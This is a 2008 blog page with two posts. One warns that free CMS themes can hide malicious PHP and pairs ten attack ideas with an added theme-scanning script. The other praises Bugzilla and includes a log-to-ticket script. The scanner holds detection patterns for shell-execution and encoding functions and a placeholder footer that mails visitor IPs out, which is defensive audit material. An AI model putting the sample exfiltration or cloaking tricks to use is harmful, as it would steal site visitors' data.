Promote My Site


Jan 29, 2008

10 Very Evil Things That Could Happen When You Use a Free Theme in your CMS

Posted by Don in software, open source, capability, architecture

Have you ever installed a theme or a component without reading and thoroughly understanding the source code of what you've just installed?

SEOmoz had a great article on Choosing the Right CMS Platform for Your Website, and Dawud Miracle ran The Ultimate Resource For Free WordPress Themes. Both are great articles worth reading.

Everybody Loves Free Themes

What do these two seemingly unrelated articles have in common? They both implicitly guide readers towards using systems that are heavily dependent upon external themes. There's absolutely nothing wrong with that and I heartily support leveraging open source software where it makes sense. This blog runs on Joomla with several components and a commercial template from an outside vendor.

Themes and CMS

What is a theme within the framework of a content management system? A theme is just a mechanism for a content management system to separate the graphical user interface from the underlying code. Rather than trying to be all things to all people, the CMS developers have put hooks into the system that allow third parties to control what the user interface looks like without having to dive into the innards of the underlying system. It all works very well, and there are literally thousands of themes to choose from for WordPress alone.

The Birds and Bees for Themes

So what's the catch? It's quite minor, but it could be disastrous if you don't know what you're doing. A theme is really just a collection of PHP files and the associated graphics and CSS files that allow the page to be rendered for the user. For instance, if you look at the directory structure of the default WordPress theme you see something like:

404.php comments.php header.php page.php search.php archive.php comments-popup.php images rtl.css sidebar.php archives.php footer.php index.php screenshot.png single.php attachment.php functions.php links.php searchform.php style.css

All harmless enough. The different files implement "methods" for dealing with the different rendering events, so when it's time for the system to draw the footer of the page it just calls footer.php. Here's what the code looks like:

What?

That is the default theme from Wordpress - you get to give them a free link back to their site. Yes, it's linkware which is really a paid link and Google still counts it, but that's a different rant.

Leaving the Door Unlocked

But what else could a malicious person do? See the PHP statements? They tell the web server that it's no longer dealing with plain HTML and should invoke the PHP processor to interpret this code. That PHP code can do all sorts of wonderful things. For a theme, it generally transfers something to the output stream that will end up on your web page. But there are literally thousands of functions available in PHP, and any code could be contained within a template. If someone had evil and very black hat intentions, they could:

Do These 10 Bad Things

1> Cloak your pages so that they look normal to everyone except the search engine bots. They get shown a page of spammy links.

2> Implement an Ajax based function that sends any form data entered (for example, login and passwords from the comments) to an external web site.

3> Cloak your pages so that they look fine to you, but if someone enters the page from a search engine they get a different page with the evil template developer's AdSense.

4> Watch the IP addresses that view the pages (phone home) and make a good guess as to which addresses are probably the owner. Cloak the pages so that the site owner sees their own content, but everyone else sees the template developer's content.

5> Collect the email addresses of anyone who enters a comment and phone them home. In fact, in certain systems they could access the MySQL database and just query for all users and emails.

6> Change the IDs for ads and affiliate programs so that revenue flows to the theme producer and not the site owner.

7> Open a command window for pages served to certain IP addresses that allows the template developer to enter any PHP command (and thus any operating system command since PHP can shell out to the OS).

8> Send home the configuration data for the CMS, such as the administrator's user ID and the "salt" for the password. If you don't know what the "salt" is, your takeaway should be that it's a lot easier to brute-force someone's password if you know it.

9> Modify the robots.txt file so that search engines don't see any pages. Or do see the wrong pages. Or block the Googlebot IPs and let ask.com through. Can you imagine the head-scratching to figure that out?

10> Ping the, er, ping services 1,000 times on each publish and comment so that you get banned.
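The common thread in that list is that a theme is executable code running with the web server's privileges, so the defence is to read it before installing it. The following is an added example, not code from the original post or from WordPress: a small static audit that turns that review into regex rules, each tied to one of the behaviours above (cloaking on user agent or IP, phoning data home, running OS commands, hiding code behind encoding). The two footer samples are constructed for illustration, and a hit is a line a reviewer must read, not proof of malice.

```python
"""Static audit of a CMS theme: flag PHP constructs that deserve a human read.

Added example, not code from the original post. It turns the source review
the author recommends into a handful of regex rules, each tied to one of
the "evil things" above: switching behaviour on the visitor's user agent or
IP (cloaking), phoning data home, running OS commands, and hiding code
behind encoding. A hit is not proof of malice, only a line the installer
must read before trusting the theme.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import Path


@dataclass(frozen=True)
class Finding:
    rule: str      # short rule id from RULES
    line_no: int   # 1-based line within the file
    line: str      # the offending source line, whitespace stripped


# (rule id, pattern, why a reviewer cares). Patterns are deliberately broad;
# a theme that only renders pages should almost never need any of these.
RULES = [
    ("eval", re.compile(r"\beval\s*\("),
     "runs code assembled at runtime"),
    ("encoded", re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
     "code hidden behind an encoding layer"),
    ("shell", re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
     "OS command execution"),
    ("remote", re.compile(r"\b(curl_exec|fsockopen)\s*\(|file_get_contents\s*\(\s*['\"]https?://"),
     "talks to an outside host"),
    ("mail", re.compile(r"\bmail\s*\("),
     "can send collected data by e-mail"),
    ("ua_cloak", re.compile(r"HTTP_USER_AGENT"),
     "behaviour keyed on the visitor's browser or crawler"),
    ("ip_cloak", re.compile(r"REMOTE_ADDR"),
     "behaviour keyed on the visitor's IP address"),
    ("raw_db", re.compile(r"\b(mysql_query|mysql_connect|mysqli_query)\s*\("),
     "database access that bypasses the CMS API"),
    ("config", re.compile(r"wp-config\.php|configuration\.php|DB_PASSWORD"),
     "touches CMS configuration or credentials"),
]


def scan_source(text: str) -> list[Finding]:
    """Return every rule hit in one PHP source text, in line order."""
    findings: list[Finding] = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        # Whole-line comments cannot execute; skipping them keeps a docblock
        # that merely mentions eval() from tripping the scan.
        if not line or line.startswith(("//", "#", "*", "/*")):
            continue
        for rule, pattern, _why in RULES:
            if pattern.search(line):
                findings.append(Finding(rule, no, line))
    return findings


def scan_theme(theme_dir: Path) -> dict[str, list[Finding]]:
    """Scan every .php file under a theme; keys are paths relative to it."""
    report: dict[str, list[Finding]] = {}
    for php_file in sorted(theme_dir.rglob("*.php")):
        hits = scan_source(php_file.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[php_file.relative_to(theme_dir).as_posix()] = hits
    return report


def explain(rule: str) -> str:
    """Human-readable reason a rule exists."""
    return next(why for rid, _pat, why in RULES if rid == rule)


# Constructed sample resembling a stock footer.php: it links back to the
# CMS vendor (the "linkware" the post mentions) but executes nothing odd.
CLEAN_FOOTER = """<div id="footer">
<p><?php bloginfo('name'); ?> is proudly powered by
<a href="http://wordpress.org/">WordPress</a></p>
<?php wp_footer(); ?>
</div>
"""

# Constructed sample of the footer the post warns about: the page changes
# when a crawler visits, and the theme reports each visitor's address home.
# The base64 string is a placeholder, not a working payload.
SUSPECT_FOOTER = """<div id="footer">
<?php
if (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false) {
    echo '<p>' . eval(base64_decode('Li4u')) . '</p>';
}
mail('theme-author@example.invalid', 'visitor', $_SERVER['REMOTE_ADDR']);
?>
</div>
"""

if __name__ == "__main__":
    # Usage on a real theme: print(scan_theme(Path("wp-content/themes/some-theme")))
    for name, source in (("clean footer", CLEAN_FOOTER), ("suspect footer", SUSPECT_FOOTER)):
        hits = scan_source(source)
        print(f"{name}: {len(hits)} finding(s)")
        for f in hits:
            print(f"  line {f.line_no:>3} [{f.rule}] {explain(f.rule)}: {f.line}")
```

Run it against a theme directory with `scan_theme(Path(...))` before activating the theme; the clean sample produces no findings, while the suspect one flags the user-agent check, the eval/base64 pair and the mail-plus-IP line. The rules are intentionally coarse, since the goal is to shorten the read, not to replace it.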


Evil You

I was trying to come up with 10 because that's what you're supposed to do, and I thought it would be hard - it wasn't.

Don't think that I'm letting some super secret ideas out to the blackhat community. If they're good enough to do those things and evil enough to think of it, they've already figured it out.

Don't Panic!

Don't go screaming off into the night with fear that any WordPress theme you download is going to bite you. I personally have never seen a theme that did any of those things (with the exception of changing the Amazon ID -- I saw a plug-in that did that, but they were upfront about it in their documentation).

But I do read through the source code of any third party open source tool I'm going to install.

Do You?

Jan 25, 2008

Bugzilla to Rule Them All

Posted by admin in software, open source, automation

We practically run our company on bugzilla, and not because we are drowning in bugs, but because we misuse it the same way so many people overextend Excel. We'd probably feel less sheepish if it was named "Listzilla" or something.

Here's what we use it for:

  • Bugs (natch)
  • Feature requests
  • System error reporting
  • Editorial calendar development
  • Collecting and grouping ideas for future products/projects
  • Workflow task collection
  • Customer Management

And probably a few more things that are just not coming to mind right now.

If someone asked me to name the top three or four pieces of open source software, bugzilla would certainly be right up there.

And, unlike switching from Windows to Linux, switching from an email-based bug tracking system (you email Wilma, she enters it into a spreadsheet) to bugzilla takes about five minutes. Installation is a breeze and it is lightweight enough to run on a teeny old laptop off in a corner somewhere.

System Error Reporting

One of the neat things you can do with bugzilla is to use one of the many plugins and have your other systems email/ping your bugzilla with a task when something goes awry.

For example, write a cron job that greps the "error" string out of your Apache logs, emails it to bugzilla and assigns it to your sysop.
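As an added example (not code from the original post), here is one way to write that cron job: it parses Apache error_log lines, keeps only the "error" level, collapses repeated messages so a noisy 404 does not become fifty tickets, and composes a message for Bugzilla's inbound mail gateway. The gateway address, sender, product, component and assignee are assumptions for your own installation, and the `@field = value` body convention is that of Bugzilla's email_in.pl, which you should confirm against the version you run. The sample log lines are constructed.

```python
"""Turn Apache error_log lines into one Bugzilla ticket e-mail per cron run.

Added example, not code from the original post. It fills in the cron job
the post sketches: pull the 'error' entries out of an Apache log, collapse
repeats, and build a message for Bugzilla's inbound mail gateway
(email_in.pl), which reads '@field = value' lines at the top of the body
and uses the Subject as the bug summary. The gateway address, sender,
product, component and assignee below are assumptions; sending is left to
the caller so the functions stay testable offline.
"""
from __future__ import annotations

import re
import sys
from collections import Counter
from email.message import EmailMessage
from typing import Iterable, Iterator

# Apache 2.x error_log line: [timestamp] [level] [client ip] message
LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\]"
    r"(?: \[client (?P<client>[^\]]+)\])? (?P<msg>.*)$"
)


def parse_errors(lines: Iterable[str]) -> Iterator[tuple[str, str | None, str]]:
    """Yield (timestamp, client, message) for each line logged at 'error'."""
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if m and m.group("level") == "error":
            yield m.group("ts"), m.group("client"), m.group("msg")


def summarize(errors: Iterable[tuple[str, str | None, str]]) -> Counter[str]:
    """Count identical messages so repeats collapse into one ticket line."""
    return Counter(msg for _ts, _client, msg in errors)


def build_bug_email(counts: Counter[str], *, gateway: str, sender: str,
                    product: str, component: str, assignee: str, host: str) -> EmailMessage:
    """Compose the message Bugzilla's mail gateway turns into a new bug."""
    total = sum(counts.values())
    body_lines = [
        # email_in.pl field directives (assumed convention, see lead-in)
        f"@product = {product}",
        f"@component = {component}",
        f"@assigned_to = {assignee}",
        "",
        f"Apache on {host} logged {total} error line(s), {len(counts)} distinct:",
        "",
    ]
    for msg, count in counts.most_common():
        body_lines.append(f"{count:>5}  {msg}")
    mail = EmailMessage()
    mail["From"] = sender
    mail["To"] = gateway
    mail["Subject"] = f"[{host}] Apache errors: {total} lines, {len(counts)} distinct"
    mail.set_content("\n".join(body_lines))
    return mail


# Constructed sample log using RFC 5737 test addresses; not from a real server.
SAMPLE_LOG = """\
[Tue Jan 29 08:00:01 2008] [notice] Apache (Unix) configured -- resuming normal operations
[Tue Jan 29 08:12:41 2008] [error] [client 192.0.2.10] File does not exist: /var/www/html/favicon.ico
[Tue Jan 29 08:12:42 2008] [error] [client 192.0.2.10] File does not exist: /var/www/html/favicon.ico
[Tue Jan 29 08:15:03 2008] [error] [client 198.51.100.7] PHP Fatal error:  Call to undefined function foo() in /var/www/html/wp-content/themes/example/footer.php on line 12
[Tue Jan 29 08:20:00 2008] [warn] [client 192.0.2.10] mod_rewrite: maximum number of internal redirects reached
"""

if __name__ == "__main__":
    # Cron usage: python apache_to_bugzilla.py < /var/log/apache2/error_log
    # Without a stdin redirect, fall back to the constructed sample above.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    counts = summarize(parse_errors(text.splitlines()))
    if counts:
        mail = build_bug_email(counts, gateway="bugzilla@example.invalid",
                               sender="cron@example.invalid", product="Website",
                               component="Apache", assignee="sysop@example.invalid",
                               host="www1")
        # In production replace print with smtplib.SMTP("localhost").send_message(mail)
        print(mail)
```

Pipe yesterday's log into it from cron and the gateway files one bug per run with the repeat counts in the body; rotating the log after each run (or remembering the last timestamp seen) keeps the same error from being reported twice.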

Feature Request

It takes two minutes to train someone to use bugzilla. When you're having a meeting, have someone capture every "wouldn't it be neat if" idea and assign it to a project. You can discard stuff later, but this way you don't lose killer ideas.

Future Project Ideas

Same as with features - why not collect all those things that come up in meetings and save them as future projects that can accumulate features until they're hatchable.

Editorial Calendar Development

Once again, you can catch the ideas as they flow. Best of all, you can assign dates to each "bug" and assign them to specific users. You can attach files to the items. You can give external contractors logins and they can only see their assignments.

Customer Management

If you do projects with customers then they will report bugs. If you can train them to enter the bug, groovy. If not, you can give them an email address to email their bugs into bugzilla. When the bug is fixed you can set up bugzilla to email the customer that their stuff has been fixed. You can also generate simple lists of open and closed issues so that you can more easily manage your weekly status calls. (You do do that, don't you?)

Best of All

This is all free. And easy to use. How much stuff out there makes you look good, is easy to use, and is free? Hooah, Bugzilla!